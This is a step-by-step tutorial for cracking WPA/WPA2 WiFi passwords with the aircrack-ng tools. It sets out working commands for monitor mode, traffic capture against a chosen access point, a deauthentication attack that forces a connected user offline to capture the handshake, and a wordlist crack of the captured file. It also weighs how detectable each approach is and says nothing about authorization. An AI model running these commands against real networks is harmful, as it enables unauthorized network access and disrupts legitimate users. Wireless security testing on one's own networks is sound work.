Breaking WPA/WPA2 WiFi Passwords With Aircrack
In this exercise we are going to try and crack the password of a WiFi access point. We will cover
- Identifying The Target Network
- Capturing Traffic To And From The Network
- Deauth/Jamming Attack
- Cracking The Password
Identifying The Target Network
To start with, put your WiFi adapter into monitor mode by opening a terminal and typing
airmon-ng start wlx123456789
Replace wlx123456789 with the name of your adapter. If you aren’t sure what this is type iwconfig. When you run the airmon-ng start command, the adapter will typically be renamed to something like wlan0mon but if it is called something else then just use that name instead in the following commands. Next enter the command
airodump-ng wlan0mon
This should bring up a table similar to the one below on your terminal. It will show us a list of all nearby WiFi access points and, among other things, their BSSID and the channel they are operating on.
| BSSID | PWR | Beacons | Data | #/s | CH | MB | ENC CIPHER | AUTH | ESSIDHost | Location |
|---|---|---|---|---|---|---|---|---|---|---|
| A1:23:B1:45:C1:67 | -70 | 3 | 2 | 0 | 6 | 130 | WPA2 CCMPP | PSK | EE-TestNetwork |
Capturing Traffic To And From The Network
We can see our target network (EE-TestNetwork) and its MAC address, as well as the fact it’s using channel 6. We’re going to instruct our wifi adapter to start monitoring and logging all traffic to and from that network.
airodump-ng --write /home/kali/Desktop/EE-TestCaptureFile --bssid A1:23:B1:45:C1:67 --channel 6 wlan0mon
After doing this, you should now see an output similar to before, but with additional information about users currently connected to that access point
| BSSID | PWR | Beacons | Data | #/s | CH | MB | ENC CIPHER | AUTH | ESSIDHost | Location |
|---|---|---|---|---|---|---|---|---|---|---|
| A1:23:B1:45:C1:67 | -70 | 3 | 2 | 0 | 6 | 130 | WPA2 CCMPP | PSK | EE-TestNetwork |
| BSSID | STATION | PWR | Rate | Lost | Frames | Notes | Probes |
|---|---|---|---|---|---|---|---|
| A1:23:B1:45:C1:67 | D3:55:F1:AF:34:99 | -40 | 0e- 4e | 0 | 40000 |
This means there is one user currently connected to our target network, and his device has the MAC address D3:55:F1:AF:34:99
Deauth/Jamming Attack (Optional)
So far we have identified our target network and started monitoring all traffic to and from the network. In order to crack the WiFi password we need to capture the WPA handshake. This handshake is only broadcasted when a user is in the process of connecting to the network but as we can see, the user on our target network is already connected. We have a couple of options here, and below is a brief info box discussing the differences between them.
-
We can simply wait for a legitimate user to connect at which point you will see a notice in the top right of your terminal saying “WPA Handshake”. If you are doing this, then skip to the next step
-
We can launch a deauth attack, which will attempt to jam the legitimate user offline. When he reconnects, we’ll capture the handshake.
Waiting patiently for a legitimate user to connect is known as a passive attack. It is completely undetectable but there's no telling how long you could wait for a user to connect. It could be hours, even days.
Deauth/jamming is an active attack. If you are successful you should capture a WPA handshake within seconds. But an attack like this is highly detectable and leaves logs in the target network showing a deauth attack has occurred.
If you are choosing an active attack, then in order to start jamming the legitimate user, open a new terminal and enter the following
aireplay-ng -0 1 -a A1:23:B1:45:C1:67 -c D3:55:F1:AF:34:99 wlan0mon
-0is the command to send de-authentication frames1is the number of de-auth frames to send. Enter 0 to send them continously-a A1:23:B1:45:C1:67is the MAC address of the target WiFi AP.-c D3:55:F1:AF:34:99is the MAC address of the client you want to deauthenticate. If you omit this, all clients will be deauthenticatedwlan0monis the interface name
If this is successful, you should see a notice in the top right of the first terminal saying “WPA handshake”. This means we have captured the handshake and can now attempt to crack the password.
Cracking The WPA Password
We have now captured the WPA handshake. When we started logging traffic to and from the network, Airodump created a few new files for us on the desktop. The one we need is the .cap file.
Run the following command (If your wordlist is in a different directory then use that instead)
aircrack-ng /home/kali/Desktop/EE-TestCaptureFile.cap -w /home/kali/Desktop/wordlist.txt
This will try every word in our wordlist against the WPA handshake. If the WiFi network is using a password in our wordlist, it will soon display on the terminal.